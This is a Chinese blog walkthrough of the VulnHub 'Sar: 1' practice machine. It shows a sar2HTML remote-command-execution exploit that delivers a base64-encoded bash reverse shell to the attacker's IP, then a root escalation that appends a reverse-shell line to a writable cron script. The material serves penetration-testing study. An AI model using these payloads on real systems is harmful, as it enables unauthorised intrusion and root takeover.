vulnhub Sar: 1

最新推荐文章于 2024-02-28 17:58:40 发布
最新推荐文章于 2024-02-28 17:58:40 发布
阅读量1.2k 收藏 2
点赞数
分类专栏: vulnhub 文章标签: base64反弹shell exploit-db 定时任务 RCE linpeas
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/elephantxiang/article/details/124570970
版权

渗透思路:

nmap扫描----dirb扫描网站目录----exploit-db查找exp----利用sar2html的RCE漏洞getshell(base64编码)----利用定时任务提权

环境信息:

靶机:192.168.101.65

攻击机:192.168.101.34

具体步骤:

1、nmap扫描

sudo nmap -sV -sC -p- 192.168.101.65

只扫描到80端口(http)

2、dirb扫描网站目录

​dirb http://192.168.101.65

查看http://192.168.101.65/robots.txt,发现sar2HTML

3、exploit-db查找exp

访问http://192.168.101.65/sar2HTML/,发现版本信息:sar2html Ver 3.2.1

Exploit Database - Exploits for Penetration Testers, Researchers, and Ethical Hackers中搜索sar2,得到2条版本匹配的结果,上面那条是个python脚本,下面那条是文字说明

查看下面那条Sar2HTML 3.2.1 - Remote Command Execution - PHP webapps Exploit

可以看出漏洞利用步骤很简单,只需要在http://<ipaddr>/index.php?plot=;<command-here>的<command-here>处输入命令,然后点击select host下拉框即可

4、利用sar2html的RCE漏洞getshell

先用id命令尝试一下:

浏览器访问http://192.168.101.65/sar2HTML/index.php?plot=;id

然后点击select host下拉框,可以看到下拉框中包含id命令的执行结果

然后尝试getshell。

经尝试,这边bash反弹shell需要base64编码,具体方式如下:

先在攻击机上输入

echo "bash -i &>/dev/tcp/192.168.101.34/8888 <&1" | base64

得到bash -i &>/dev/tcp/192.168.101.34/8888 <&1的base64编码

再组合成下面的payload,也就是在靶机上将YmFzaCAtaSAmPi9kZXYvdGNwLzE5Mi4xNjguMTAxLjM0Lzg4ODggPCYxCg==进行base64解码之后再执行

echo YmFzaCAtaSAmPi9kZXYvdGNwLzE5Mi4xNjguMTAxLjM0Lzg4ODggPCYxCg== | base64 -d | bash

攻击机上nc监听8888端口

nc -nlvp 8888

然后浏览器访问

http://192.168.101.65/sar2HTML/index.php?plot=;echo%20YmFzaCAtaSAmPi9kZXYvdGNwLzE5Mi4xNjguMTAxLjM0Lzg4ODggPCYxCg==%20|%20base64%20-d%20|%20bash

然后攻击机上nc监听的端口就获得了靶机www-data用户的反弹shell

5、利用定时任务提权

love的家目录下执行以下命令,迭代查看该目录下的文件。

ls -alR

只找到第一个flag:/home/love/Desktop/user.txt

攻击机上linpeas.sh所在目录下起http服务

python2 -m SimpleHTTPServer 9999

靶机/tmp目录下执行

wget http://192.168.101.34:9999/linpeas.sh
chmod +x linpeas.sh
./linpeas.sh

linpeas.sh的执行结果中有个非常可疑的定时任务,root每隔5分钟执行一次/var/www/html/finally.sh

后来找了一下是/etc/crontab中写的

查看/var/www/html/finally.sh的内容,发现它执行了/var/www/html/write.sh

由于/var/www/html/write.sh是可以修改的,因此可以将反弹shell命令加入该文件中,这样定时任务执行的时候就可以得到root用户的反弹shell

将反弹shell命令写入/var/www/html/write.sh

echo "bash -c 'exec bash -i &>/dev/tcp/192.168.101.34/7777 <&1'" >> write.sh

查看是否写入成功

攻击机上nc监听7777端口

nc -nlvp 7777

等待几分钟之后,获得root的反弹shell

查看flag:/root/root.txt

仙女象
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sar2html-开源
05-25
Sar2html是基于Web的性能监视前端。 它将sar二进制数据转换为图形格式,并将历史数据保留在其数据库中。 项目主页在这里:https://github.com/cemtan/sar2html.git支持的操作系统:HPUX 11.11、11.23、11.31 Solaris 5.9、5.10、5.11 Redhat 3、4、5、6、7 Suse 8、9 ,10,11,12 Ubuntu 18,20如果您的客户在上述操作系统上遇到性能问题,则可以发送sar2ascii来收集性能数据。 然后,您可以绘制性能图形,并通过sar2html以pdf文件格式生成性能报告。 请记住,捐赠鼓励开发人员实施更多。
Vulnhub_Sar2Html Ver 3.2.1靶机渗透测试
m0_66225311的博客
09-18 144
依旧是使用nmap进行信息收集,只开放80端口,就需要在网站上寻找突破点了本次靶机web网站使用的是一个sar2html工具,该版本存在远程命令执行漏洞可以利用善于进行搜索,发现可疑的名称版本信息去寻找是否有相应的漏洞能进行命令执行,那就可以选择直接执行反弹shell的命令,不成功就选择wget下载反弹shell的脚本文件本次靶机提权使用到的是定时任务进行提权,提权方式相对简单,只要找到对应的定时任务脚本查看里面内容即可。
实战打靶集锦-012-sar2HTML
阿尔泰野狼的博客
03-19 469
本文记录博主的一次打靶经历。
【学渗透靶机——sar 1】
jieli0901227的博客
06-20 528
主机漏洞扫描完成,这台靶机只开放了80 端口,通过nmap l漏洞扫描发现有robots.txt 和phpinfo.php 两个文件。切换到目录、var/www/html下 查看finally.sh ,这个脚本调用了write.sh ,robots 这个文件是方式爬虫爬取网站的,那么这个字符串有可能就是路径了,访问看看,80 端口默认页是一个apache服务的默认页面,没有什么特殊的地方。1、首先靶机主机ip发现, 端口扫描(),nmap 漏洞探测。那就好办了,,尝试利用下,镜像下来,打开看看。
Linux 从 sarsar2html 的认识
记录创业路上的一些想法
07-24 2657
Linux sar
sar:搜索和替换命令行工具-开源
05-13
此命令行工具可用于搜索和替换文件中的文本。
matlab三维图像代码-sar:SAR成像的自动聚焦和图像处理算法
05-20
该存储库包含用于SAR图像处理和自动聚焦算法的所有源代码。 有关详细信息,请参阅每个子目录的README 。 data_collection 所有用于实时收集雷达数据的程序。 2d_autofocus 与3d_autofocus类似,但仅适用于二维光圈。...
计算抛物线SAR:计算抛物线SARSAR-停止和反向)-matlab开发
05-30
输出: SAR - 抛物线 SAR 的输出向量turnPoints - SAR 向量中的转弯位置longSort - 长=1,排序=-1 例子: % 读取 JNJ 股票数据url2Read = ' ...
SAR图像处理1
05-12
SAR图像处理1 SAR 课件 SAR学习入门的教材
java-sar:一个简单Linux SAR文件(系统活动报告)分析器
06-01
java-sar 一个简单Linux SAR文件(系统活动报告)分析器
靶机练习之sar
qq_52360932的博客
04-01 4594
靶机练习之sar,学习笔记
靶机渗透之sar
最新发布
weixin_64267091的博客
02-28 1069
靶机渗透过程也就分为那几步骤,首先就是信息收集,找ip,端口,目录,漏洞。然后就进行漏洞分析,在进行漏洞分析的时候使用到了kali中自带的工具searchsploit,使用它搜索sar2HTML存在的漏洞,然后将漏洞利用脚本拷贝到本地,最后得知漏洞利用方式。最后就利用远程代码执行漏洞,上传反弹shell脚本,上传脚本一直出问题,也不知道为啥,最后上传了个shell.py,反弹成功。然后就是最后提权部分,利用了计划任务提权,获取root权限的关键是finally.sh脚本以root用户的权限来执行。
vulnhub:Sar
cjstang的博客
06-16 758
OSCP-2:这次练习的靶机是vulnhub平台下的sar,该靶机是一个类似oscp的虚拟机,目的是提高并巩固渗透测试的知识点。 主要利用方式:sar2HTML命令执行反弹shell(可php文件上传反弹shell)+定时脚本提权......
vulnhub sar 靶场练习
鸥鹭忘机
09-07 2060
前言 这次练习的靶机是vulnhub平台下的sar,该靶机是一个类似oscp的虚拟机,目的是提高并巩固渗透测试的知识点。下载地址为https://www.vulnhub.com/entry/sar-1,425/。这个靶机中没有出现新的知识点,难度相对比较简单。如果看过我前面vulnhub DC系列的文章,那么这次靶机可以独立自主完成。 虚拟机配置 这次采用的网络连接模式依然是NAT模式,为了避免扫描到其他物理主机。在导入虚拟机后,右击sar靶机,然后选中配置。依次点击网络配置->NAT模式->高
WEB漏洞测试(二)——HTML注入 & XSS攻击
热门推荐
qq_28241149的博客
02-28 2万+
上一篇介绍了我们安装BWAPP来完成我们的漏洞测试 在BWAPP中,将HTML Injection和XSS做了非常详细的分类,那么为什么要将两个一起讲呢?归根结底,我觉得这两个分明是一个玩意,充其量是攻击的方式不一样。 我们先来介绍一下这两种漏洞的原理,简单说:当用户在输入框输入内容,后台对输入内容不做处理直接添加入页面的时候,用户就可以刻意填写HTML、JavaScript脚
Vulnhub-靶机-Sar 1
qq_43264813的博客
01-27 1156
Vulnhub—靶机—Sar 1 本篇文章仅用于技术交流学习和研究的目的,严禁使用文章中的技术用于非法目的和破坏,否则造成一切后果与发表本文章的作者无关 地址:https://www.vulnhub.com/entry/sar-1,425/ 文章目录Vulnhub—靶机—Sar 1一、信息收集二、漏洞利用三、Flag 一、信息收集 【步骤一】使用nmap确定目标靶机地址: 【命令】nmap -sP 192.168.110.0/24 【步骤二】对目标靶机进行全端口扫描: 【命令】nmap -n -sC -s
行走的漏洞利用机器人:僵尸网络病毒携71个EXP占领高地
whatday的专栏
12-31 975
前言 僵尸网络 Botnet 是指采用一种或多种传播手段,将大量主机感染bot程序(僵尸程序)病毒,从而在控制者和被感染主机之间所形成的一个可一对多控制的网络。 攻击者通过各种途径传播僵尸程序感染互联网上的大量主机,而被感染的主机将通过一个控制信道接收攻击者的指令,组成一个僵尸网络。之所以用僵尸网络这个名字,是为了更形象地让人们认识到这类危害的特点:众多的计算机在不知不觉中如同中国古老传说中的...
Nmap扫描二级目录
weixin_38166689的博客
07-04 1248
nmap --script http-enum -p80 192.168.2.100 //namp扫描2级目录 转载于:https://www.cnblogs.com/xiaoyunxiaogang/p/11134600.html
sar1靶机练习
SYJ_361的博客
04-01 4838
本文通过kali渗透sar1靶机获得root权限,利用kali找到对应的模块,查看漏洞信息,构造payload下载文件,用蚁剑反弹shell,最终获得root权限
vulnhub sar
09-09
vulnhub sar是一个类似OSCP的虚拟机,它旨在帮助用户提高和巩固渗透测试的知识点。如果你想下载sar靶机,你可以在GitHub上找到它,具体来说,你可以在pentestmonkey的php-reverse-shell存储库中找到它。如果你已经...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值